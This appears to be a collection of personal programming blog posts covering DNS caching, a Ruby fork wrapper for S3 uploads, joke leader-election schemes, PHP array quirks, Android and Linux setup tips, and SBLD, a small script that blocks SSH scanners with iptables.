API latency has been wonky the last couple weeks; for a few hours it will rise to roughly 5 to 10x normal, then drop again. Nothing in syslog, no connection table issues, ip stats didn't reveal any TCP/IP layer difficulties, network was solid, no CPU, memory, or disk contention, no obviously correlated load on other hosts. Turns out it was Bind getting overwhelmed (we have, er, nontrivial DNS demands) and causing local domain resolution to slow down. For now I'm just pushing everything out in /etc/hosts, but will probably drop a local bind9 on every host as a cache.

If anyone has experience with production DNS resolver caching, would appreciate your input.

John Mullerleile, Phil Kulak, and I gave a talk tonight, entitled "Scaling at Showyou."

stack.png

I gave an overview of the Showyou architecture, including our use of Riak, Solr, and Redis; strategies for robust systems; and our comprehensive monitoring system. You may want to check out:

Phil talked a little bit about the importer, including our use of Node.js and some nice stats.

John dropped lots of juicy details regarding his exciting projects, including a new Riak backend which binds together Solr, LevelDB, and a distributed processing system we're calling Fabric. Fast parallelized key listing, range queries, full-text search, geospatial queries, etc. In Riak. Yes, you heard that right.

Oh, and as a part of Fabric we've got a distributed queue with replicated failover and transactions, built on top of Hazelcast. Exposed over protocol buffers. We've got some polishing to do before that gets released, but when it does, should be worthy of another talk.

AWS::S3 is not threadsafe. Hell, it’s not even reusable; most methods go through a class constant. To use it in threaded code, it’s necessary to isolate S3 operations in memory. Fork to the rescue!

require 'aws/s3'
require 'timeout'

def s3(key, data, bucket, opts)
  begin
    fork_to do
      AWS::S3::Base.establish_connection!(
        :access_key_id     => KEY,
        :secret_access_key => SECRET
      )
      AWS::S3::S3Object.store key, data, bucket, opts
    end
  rescue Timeout::Error
    raise SubprocessTimedOut
  end
end

def fork_to(timeout = 4)
  r, w, pid = nil, nil, nil
  begin
    # Open pipe
    r, w = IO.pipe

    # Start subprocess
    pid = fork do
      # Child
      begin
        r.close
        val = begin
          Timeout.timeout(timeout) do
            # Run block
            yield
          end
        rescue Exception => e
          e
        end
        w.write Marshal.dump val
        w.close
      ensure
        # YOU SHALL NOT PASS
        # Skip at_exit handlers.
        exit!
      end
    end

    # Parent
    w.close
    Timeout.timeout(timeout) do
      # Read value from pipe
      begin
        val = Marshal.load r.read
      rescue ArgumentError => e
        # Marshal data too short
        # Subprocess likely exited without writing.
        raise Timeout::Error
      end

      # Return or raise value from subprocess.
      case val
      when Exception
        raise val
      else
        return val
      end
    end
  ensure
    if pid
      Process.kill "TERM", pid rescue nil
      Process.kill "KILL", pid rescue nil
      Process.waitpid pid rescue nil
    end
    r.close rescue nil
    w.close rescue nil
  end
end

There’s a lot of bookkeeping here. In a nutshell we’re forking and running a given block in a forked subprocess. The result of that operation is returned to the parent by a pipe. The rest is just timeouts and process accounting. Subprocesses have a tendency to get tied up, leaving dangling pipes or zombies floating around. I know there are weak points and race conditions here, but with robust retry code this approach is suitable for production.

Using this approach, I can typically keep ~8 S3 uploads running concurrently (on a fairly busy 6-core HT Nehalem) and obtain ~sixfold throughput compared to locking S3 operations with a mutex.
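The driver side, keeping several uploads in flight at once, can be sketched with a work queue and a fixed pool of threads; `upload` here is a self-contained stand-in for the fork-isolated S3 call:

```ruby
# Keep several uploads in flight with a work queue and a fixed pool of
# threads. `upload` is a stand-in for the fork-isolated S3 call.
def upload(item)
  item.to_s.length  # pretend this ships bytes to S3
end

def parallel_uploads(items, workers = 8)
  queue = Queue.new
  items.each { |i| queue << i }
  results = Queue.new
  threads = Array.new(workers) do
    Thread.new do
      loop do
        item = queue.pop(true) rescue break  # non-blocking pop; stop when drained
        results << upload(item)
      end
    end
  end
  threads.each(&:join)
  Array.new(results.size) { results.pop }
end

parallel_uploads((1..20).to_a).size  # => 20
```

Since each worker forks per operation, the MRI global lock only serializes the bookkeeping, not the uploads themselves.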

In distributed systems, one frequently needs a set of n nodes to come to a consensus on a particular coordinating or master node, referred to as the leader. Leader election protocols are used to establish this. Sure, you could do the Swedish or the Silverback, but there's a whole world of consensus algorithms out there. For instance:

The Agent Smith

Each node injects its neighbors with a total copy of its own state and identity, taking over operations on that node. Convergence is reached when all nodes are identical.

The Highlander Ending

This trivial algorithm simply ensures that all nodes crash upon receiving any decapitate message from a neighbor k. That node's responsibilities and powers are delegated to k. The last node standing wins.

The Deathly Hallows

Each node i contacts zero to n-1 other nodes, and stores upon each a prime number known as a hoarcrux. The product of all hoarcruxen is the Avada Kedavra for node i; when i receives it in a message, it immediately exits the leader election process. Each node proceeds to contact its neighbors in search of hoarcruxes, and attempts to use them to win the election. If a node is terminated while its killing curse is "in flight", the curse is negated and both nodes seek new targets.

The Terminator II

This leader election protocol can only be implemented on computational substrates embedded in closed timelike curves. This system has the happy property of never encountering a conflict. If two nodes ever conflict, each dispatches a function to before the origin of the system, killing its competitor before it enters the cluster. Logical coherency then requires that the system proceed without ever encountering a failure.

Note: attempts to implement this process have resulted in the untimely and grisly redacted redacted redacted of no fewer than -0 programmers, due to we regret to inform you that this message is inappropriate for younger viewers.

The Cthulu Fhtagn

A small subset of nodes are classified as the Old Ones and enter sleep. All other nodes are considered cultists and send messages to a randomly selected Old One. When a sufficient (randomly determined) number of prayers have been received by an Old One (or whenever it feels like), it awakens and is considered the leader. All cultists immediately dump core.

Note: Astute readers may have noticed this protocol does not guarantee a leader exists, or for that matter, that there is at maximum only one leader. Embrace chaos.

Note: CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN

Note: A variant of this algorithm is used in several popular distributed databases.

The Folsom State Fair

Each node is designated, by PRNG, a "top" or "bottom" role, and begins in state virgin. Each bottom b advertises its availability to its neighbors; when it encounters a top t, b changes state to claimed and considers itself the property of t. When all bottoms have given up their virginity, the leader is the top with the most claimed nodes. Ties are resolved by selecting the remaining tops and recursively evaluating the protocol, only this time every node issues a log message that it's really just versatile.

The Congressional Election

Nodes assign themselves to one of two parties, A or B, by random value. A quorum agreement between nodes is required to elect a leader. Voting for a leader proceeds in synchronized rounds, typically lasting multiple days.

When a vote arises, each node issues a broadcast message informing the cluster of its vote. A nodes always vote for the A node with the highest process identifier. B nodes always vote for the B node with the highest process identifier.

If at any point more than 60% of the messages received by a given node are for the opposite party, that node initiates a filibuster. It spams the network with a hold message, during which no other nodes can proceed with the election process.

This protocol proceeds until the cluster has almost exhausted virtual memory, at which point a quarter of the processes (with the exception of the distributed system itself) on each host are terminated, and the election process restarts.

If you ever need to unzip data compressed with zlib without a header (e.g. produced by Erlang's zlib:zip), it pays to be aware that

windowBits can also be -8..-15 for raw inflate. In this case, -windowBits determines the window size. inflate() will then process raw deflate data, not looking for a zlib or gzip header, not generating a check value, and not looking for any check values for comparison at the end of the stream. (zlib.h)

Hence, you can do something like

require 'zlib'

zs = Zlib::Inflate.new(-15)
unzipped = zs.inflate(string)
zs.finish
zs.close

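For the reverse direction, a negative window size on the deflater likewise produces raw, headerless output, which round-trips with a raw inflater; the helper names here are my own:

```ruby
require 'zlib'

# A negative window size also gives raw (headerless) deflate output,
# which round-trips with a raw inflater. Helper names are illustrative.
def raw_deflate(string)
  zs = Zlib::Deflate.new(Zlib::DEFAULT_COMPRESSION, -15)
  out = zs.deflate(string, Zlib::FINISH)
  zs.close
  out
end

def raw_inflate(string)
  zs = Zlib::Inflate.new(-15)
  out = zs.inflate(string)
  zs.finish
  zs.close
  out
end

raw_inflate(raw_deflate("hello"))  # => "hello"
```

Feeding that raw output to an ordinary `Zlib::Inflate.inflate` raises `Zlib::DataError`, since there's no zlib header to check.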
23:09 < justin> Erlang tattoo might be cool
23:09 < justin> not many have those
23:10 < justin> not even sure what that would look like
23:10 < aphyr_> Yeah, really gonna add to my aura of mysterious sexiness
23:10 < aphyr_> "What's that?"
23:10 < aphyr_> "Oh, that's Erlang. It's a distributed functional programming language."
23:10 < justin> Mad tail
23:10 < aphyr_> "Tell me, would you and your friends like to do it... concurrently?"
23:13 < aphyr_> "Oh sorry. You're not my... TYPE."
23:13 < aphyr_> DAMN YOOOOUUU STATIC COMPILERS!

Things are getting a little slap-happy here in the final hours before Showyou launch.

I just built a Chrome extension for Vodpod.com. It builds off of the high-performance API I wrote last year, and offers some pretty sweet unread-message synchronization. You'll get desktop notifications when someone you know collects a video, in addition to a miniature version of your feed.

As it turns out, Chrome is really great to develop for. Everything just works, and it works pretty much like the standard says it should. Local storage, JSON, inter-view communication, notifications... all dead simple. Props to the Chrome/Chromium teams!

Here's the quickest way I know to get Eclipse up and running with the Android SDK plugin. To install each of these packages, go to Help->Install New Software, add the given URI as a package source, and install the given package. Eclipse may prompt you to restart after some installs.

Source                                                        Package
http://download.eclipse.org/tools/gef/updates/releases/       GEF SDK
http://download.eclipse.org/modeling/emf/updates/releases/    EMF SDK 2.5.0 (EMF + XSD)
http://download.eclipse.org/webtools/updates                  Web Tools Platform / Eclipse XML Editors and Tools
https://dl-ssl.google.com/android/eclipse/                    Developer Tools

That should do it for you!

$ adb devices
List of devices attached
????????????    no permissions

A few things have changed since the Android docs were written. If you want to talk to your Motorola Droid via ADB in Ubuntu 9.10 Karmic, I recommend the following udev rule.

# /etc/udev/rules.d/99-android.rules
SUBSYSTEM=="usb", ATTRS{idVendor}=="22b8", SYMLINK+="android_adb", MODE="0666", GROUP="plugdev"

Restart udev, unplug and re-plug the device, and it should show up! Make sure USB debugging is enabled on your droid.

$ sudo restart udev
$ adb devices
List of devices attached
0403681F17009017    device

If that doesn't work, try restarting the adb server:

$ adb kill-server
$ nohup adb start-server

Yamr

Sometime in the last couple of weeks, the Yammer AIR client stopped fetching new messages. I've grown to really like the service, especially since it delivers a running stream of commits to the Git repos I'm interested in, so I broke down and wrote my own client.

Yamr is a little ruby/gtk app built on top of jstewart's yammer4r and danlucraft's awesome Ruby WebKit-GTK+ bindings. No seriously, Dan, you rock.

Features

  • Reads messages
  • Posts messages
  • OAuth support
  • Notifies you using libnotify, instead of that awful AIR thing.

Anyway, feel free to fork & hack away. You should be able to build ruby-webkit without much trouble on Ubuntu; I've included directions in the readme. It's super-basic right now, but the core functionality is in place and ready for new features. Enjoy!

All right boys and girls, I'm all for quality releases and everything, but Cortex Reaver 0.2.0 is raring to go. Just gem upgrade to get some awesome blogging goodness.

I threw together a little jQuery tag editor last weekend for Cortex Reaver, since hours of google searching turned up, well, not much. Feel free to try the demo and use it for your projects.

A bit of context, in case you haven't been keeping up with the real-time web craze:

RSSCloud is an... idea* for getting updates on RSS feeds to clients faster, while decreasing network load. In traditional RSS models, subscribers make an HTTP request every 10 minutes or so to a publisher to check for updates. In RSSCloud, a cloud server aggregates several feeds from authors. When feeds are changed, their authors send an HTTP request to the cloud server, notifying it of the update. The cloud server contacts one or more subscribers of the feed, sending them a notice that the feed has changed. The subscribers then request the feed from the authors. Everyone gets their updates faster, and with fewer requests across the network.

The Problem

When you subscribe to an RSSCloud server, you tell it several things about how to notify you of changes:

  1. A SOAP/XML-RPC notify procedure (required but useless for REST)
  2. What port to call back on.
  3. What path to make the request to.
  4. The protocol you accept (XML-RPC, SOAP, or HTTP POST).
  5. The URLs of the feeds to subscribe to.
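Concretely, a REST-flavored subscription might POST parameters like these; the names follow the RSSCloud walkthrough (notifyProcedure, port, path, protocol, url1..urlN), but treat this as an illustrative sketch rather than a reference implementation:

```ruby
require 'net/http'
require 'uri'

# Building a subscription request body. Parameter names follow the
# RSSCloud walkthrough (notifyProcedure, port, path, protocol,
# url1..urlN); treat this as an illustrative sketch.
def subscription_params(port, path, feeds)
  params = {
    "notifyProcedure" => "",        # required, but unused for plain HTTP POST
    "port"            => port.to_s,
    "path"            => path,
    "protocol"        => "http-post"
  }
  feeds.each_with_index { |url, i| params["url#{i + 1}"] = url }
  params
end

params = subscription_params(8080, "/rsscloud/notify",
                             ["http://example.com/feed.rss"])
# Net::HTTP.post_form(URI("http://cloud.example.com/pleaseNotify"), params)
```

Notice what's absent: nowhere do you say *which host* to notify. The server infers it from the connection's source address, which is exactly the problem.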

There's something missing! The RSSCloud walkthrough says:

Notifications are sent to the IP address the request came from. You can not request notification on behalf of another server.

That's great unless your originating IP address can't receive HTTP traffic. That rules out users behind a NAT or behind a firewall (without forwarded ports). That's most home users with routers, users on typical corporate networks, etc. It won't work on the iPhone. And, to a lesser degree, it rules out the cloud itself.

One of the common aspects of cloud computing is that compute nodes (and their IP addresses) may come and go as needed. For example, Vodpod.com is served by several different servers which (through a combination of heartbeat-failover, IP routing, and HTTP proxying) may enter and leave the cluster at any time without service interruption. So, if one of those servers subscribes to a feed, it might not be online to receive pings later. You'd have to subscribe to each feed from every host to guarantee that you'd continue to receive responses. The problem only becomes worse when you start looking at cloud services like EC2.

The RSSCloud mailing list has been tossing around the obvious solution for several weeks now: just include a "domain" parameter which says what FQDN or IP address to connect to. On Friday, Dave Winer included it in his walkthrough. Even so, most of the cloud servers (Wordpress, for example) out there don't support it yet.

A Partial Solution

What can you do to get around this?

One solution is to use PubSubHubbub, which uses a full callback URL. Additionally, Superfeedr will even use RSSCloud to offer real-time updates through PuSH, effectively bridging the two schemes.

Alternatively, you can lie (sort of) about your address. This is what we've done at Vodpod to get Wordpress to call us back correctly. When we subscribe, we actually re-bind the TCP socket to a publicly accessible IP. That IP is guaranteed to go somewhere in the cluster which can accept the RSSCloud update ping. Here's a truly evil hack to do just that, by replacing Net::HTTP's TCP socket with our own.

require 'net/http'
require 'socket'

res = Net::HTTP.new(uri.host, uri.port).start do |http|
  # Replace the socket with one that we bind to the interface we want to use.
  # The local IP address we'd like RSSCloud to call back.
  local_addr = Socket.pack_sockaddr_in 0, '208.101.30.10'

  # The RSSCloud server IP address
  remote_addr = Socket.pack_sockaddr_in uri.port, uri.host

  # Create a new socket
  s = Socket.new Socket::AF_INET, Socket::SOCK_STREAM, 0

  # Bind it to the local address
  s.bind local_addr

  # Wrap for Net::HTTP and connect
  socket = Net::BufferedIO.new(s)
  s.connect remote_addr

  # Replace the HTTP client's connection
  http.instance_variable_set('@socket', socket)

  # And make the request
  http.request(req)
end

*Dave says it's not a standard, or a spec. As far as I can tell, RSSCloud consists of a mailing list, a walkthrough of how implementations can handle the pings/cloud tag in RSS feeds, and a bunch of loosely federated implementations with varying degrees of compatibility. Some speak XML-RPC, some speak SOAP, some speak plain-old REST, etc...

Reading the PHP documentation has convinced me (again) of what a mind-bogglingly broken language this is. Quickly, see if you can predict this behavior:

<?php
echo "This is the integer literal octal 010: " . 010 . "\n\n";

$things = array(
  "The 0th element",
  "The 1st element",
  "The 2nd element",
  "The 3rd element",
  "The 4th element",
  "The 5th element",
  "The 6th element",
  "The 7th element",
  "The 8th element",
  "8"   => "The element indexed by '8'",
  "foo" => "The element indexed by 'foo'",
  "010" => "The element indexed by '010'"
);

// The string index "8" clobbered the integer index 8.
// But the string index "010" didn't...
echo "Now check out what PHP thinks the array is...";
print_r ($things);
echo "\n\n";

// As expected
echo "\$things[0]: $things[0]\n";
echo "\$things[1]: $things[1]\n";

// Okay, so strings are interpreted as integers sometimes...
echo "\$things[\"0\"]: " . $things["0"] . "\n";

// Ah, now things become strange. This integer key gets the string "8" instead.
echo "\$things[8]: $things[8]\n";

// This should refer to the 8th element, but it gets converted to an integer by
// the preprocessor, then to a string, where it matches the clobbered 8th
// element...
echo "\$things[010]: " . $things[010] . "\n";

// This string key returns the expected "8" element...
echo "\$things[\"8\"]: " . $things["8"] . "\n";

// But this string octal key gets the "010" key as expected. Note that it
// *doesn't* get the integer 8, as you might expect from $things["0"]
echo "\$things[\"010\"]: " . $things["010"] . "\n";
echo "\n";
?>

Here's the output (PHP 5.2.6-3ubuntu4.1):

This is the integer literal octal 010: 8

Now check out what PHP thinks the array is...Array
(
    [0] => The 0th element
    [1] => The 1st element
    [2] => The 2nd element
    [3] => The 3rd element
    [4] => The 4th element
    [5] => The 5th element
    [6] => The 6th element
    [7] => The 7th element
    [8] => The element indexed by '8'
    [foo] => The element indexed by 'foo'
    [010] => The element indexed by '010'
)

$things[0]: The 0th element
$things[1]: The 1st element
$things["0"]: The 0th element
$things[8]: The element indexed by '8'
$things[010]: The element indexed by '8'
$things["8"]: The element indexed by '8'
$things["010"]: The element indexed by '010'

This is an excellent example of why grafting features onto your language piecemeal to satisfy users who can't be bothered to figure out whether they are working with strings or integers is a Bad Idea™.

I released version 0.1.3 of Construct today. It incorporates a few bugfixes for nested schemas, and should be fit for general use.

I got tired of writing configuration classes for everything I do, and packaged it all up in a tiny gem: Construct.

Highlights

OpenStruct-style access to key-value pairs.

config.offices = ['Sydney', 'Tacoma']

Nested structures are easy to handle.

config.fruits = {
  :banana => 'slightly radioactive',
  :apple => 'safe'
}
config.fruits.banana # => 'slightly radioactive'

Overridable, self-documenting schemas for default values.

config.define(:address, :default => '1 North College St')
config.address # => '1 North College St'
config.address = 'Urnud'
config.address # => 'Urnud'

Straightforward YAML saving and loading.

config.to_yaml; Construct.load(yaml)

Define whatever methods you like on your config.

class Config < Construct
  def fooo
    foo + 'o'
  end
end

It's available as a gem:

gem install construct

A few minutes ago, I realized my disk was paging when I ran Vim. Took a quick look at gkrellm, and yes, in fact, I was almost out of swap space, and physical memory was maxed out. The culprit was Firefox, as usual; firefox-bin was responsible for roughly a gigabyte of X pixmap memory.

So I spent some time digging, and realized that I'd had a window open to the Nagios status map for a few hours, which includes a 992 x 1021 pixel PNG. The page refreshes every minute or so. So I closed Firefox, brought up xrestop, opened the status map again, and watched. Sure enough, X pixmap usage for Firefox jumped up by about 2500K per refresh. In the last 10 minutes or so, that number has ballooned to roughly 50MB.

What gets me is that this is the same image being loaded again and again. It's not just the back-page cache--it looks like Firefox is keeping every image it loads in X memory, and it never goes away: closing the tab, closing the window, clearing the cache... it looks like nothing short of ending the process frees those pixmaps. :-(

I run Fluxbox as my primary window manager, and use gnome-settings-daemon to keep gnome apps happy and GTK-informed. Thus far, all has gone well. However, OpenOffice.org does something very funky to determine whether one is using KDE or GTK, finds neither on my system, and drops back to the horribly ugly interface of 1997.

I haven't figured out how to fix this yet, but running gnome-session sets up something which convinces OpenOffice to use the GTK theme. It doesn't appear to be an environment variable, because I can set my environment identically under gnome and fluxbox, with no difference in OO behavior. My guess is there's some sort of socket or temporary file set by gnome-session, but it's all a mystery and the source is obfuscated. If anyone knows of a way to force OpenOffice 2.0 to use GTK, I'd be interested to hear about it.

I just realized that aside from simple copies, the ALSA route_policy duplicate will mix to arbitrary numbers of output channels AND that such a device can use a Dmix PCM device as its slave. This means that it's possible to take 2 channel CD audio and have it mixed to 5.1 channel surround, and still let other applications use the sound card. This makes XMMS very happy.

On the other hand, my onboard i810 sound card reverses the surround and center channels, and it does some funky mixing on the center channel for the subwoofer, which sounds really messed up when played on the rear speakers. I haven't figured out how to compensate for this yet.

A useful ALSA FAQ can be found here: http://alsa.opensrc.org/faq/.

I wrote a quick script to analyze the logs generated by SBLD. You can pull them out of syslog, or (as I'm doing), have your log checker aggregate SBLD events for you. I'm making the statistics for my site available here, as a resource for others.

If you run a server with SSHD exposed to the internet, chances are that server is being scanned for common username and password combinations. These often appear in the authorization log (/var/log/auth.log) as entries like:

Jun 12 13:33:57 localhost sshd[18900]: Illegal user admin from 219.254.25.100
Jun 12 13:37:17 localhost sshd[18904]: Illegal user admin from 219.254.25.100
Jun 12 13:37:20 localhost sshd[18906]: Illegal user test from 219.254.25.100
Jun 12 13:37:22 localhost sshd[18908]: Illegal user guest from 219.254.25.100

Extend that for several hundred lines, and you'll have an idea of what one scan looks like.

Being somewhat opposed to the idea of people clogging my logs with useless information, I wrote a small perl script to detect these entries in the log file and block the offending source address using iptables. It detects scans within a matter of seconds, and blocks the IP quickly to stop the attack. Blocks are only enabled for a short time--as little as 30 seconds is enough to discourage most automated scanners. SBLD limits the number of simultaneous bans to reduce iptables load and its own resource usage, and gradually decreases the alert level for hosts when no attack is taking place.

With SBLD, the scan is quickly detected and ended.

Jun 17 13:31:58 localhost sshd[3314]: Illegal user test from 209.76.72.12
Jun 17 13:31:59 localhost sshd[3316]: Illegal user test from 209.76.72.12
Jun 17 13:32:00 localhost sshd[3322]: Illegal user tester from 209.76.72.12
Jun 17 13:32:00 localhost sbld[3326]: Blocked 209.76.72.12
Jun 17 13:32:30 localhost sbld[3326]: Unblocked 209.76.72.12

The detection method itself is a simple regex applied to the log file, so it should be fairly easy to extend the daemon to block other kinds of attacks.
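The detection step can be sketched in a few lines: a regex over the log, a per-IP counter, and a ban threshold. This is an illustrative reconstruction, not SBLD's actual code; the real daemon also handles unbanning, alert decay, and iptables:

```ruby
# A sketch of SBLD-style detection: a regex over auth.log lines, a
# per-IP counter, and a ban threshold. Illustrative only; the real
# daemon also handles unbanning, alert decay, and iptables.
LINE = /Illegal user \S+ from (\d{1,3}(?:\.\d{1,3}){3})/

def scanners(log_lines, threshold = 3)
  counts = Hash.new(0)
  log_lines.each do |line|
    counts[$1] += 1 if line =~ LINE
  end
  counts.select { |_ip, n| n >= threshold }.keys
end

log = [
  "Jun 12 13:33:57 localhost sshd[18900]: Illegal user admin from 219.254.25.100",
  "Jun 12 13:37:17 localhost sshd[18904]: Illegal user admin from 219.254.25.100",
  "Jun 12 13:37:20 localhost sshd[18906]: Illegal user test from 219.254.25.100",
  "Jun 12 13:37:22 localhost sshd[18908]: Illegal user guest from 219.254.25.100",
]
scanners(log)  # => ["219.254.25.100"]
```

Each IP the function returns would then get a temporary iptables DROP rule.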

SBLD is still under development, but I'd like to encourage people to try it out and/or offer improvements. I make no guarantees as to the performance, safety, or security of this software. Contact me with feedback.

Files

Copyright © 2015 Kyle Kingsbury.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.